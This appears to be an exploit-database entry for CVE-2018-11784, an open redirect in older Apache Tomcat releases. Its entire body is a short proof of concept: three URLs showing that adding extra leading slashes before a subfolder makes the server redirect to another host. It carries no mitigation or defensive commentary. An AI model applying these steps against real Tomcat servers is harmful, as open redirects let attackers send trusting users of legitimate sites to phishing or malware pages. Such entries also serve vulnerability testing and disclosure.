Share
## https://sploitus.com/exploit?id=1337DAY-ID-36545
# Exploit Title: Apache Tomcat 9.0.0.M1 - Open Redirect
# Exploit Author: Central InfoSec
# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.11, 8.5.0 to 8.5.33, and 7.0.23 to 7.0.90
# CVE : CVE-2018-11784

# Proof of Concept:

# Identify a subfolder within your application
http://example.com/test/

# Modify the URL to include at least 2 leading slashes before the subfolder and no trailing slash
http://example.com//test

# Browse to the newly created URL and the application will perform a redirection
http://test/

#  0day.today [2021-09-29]  #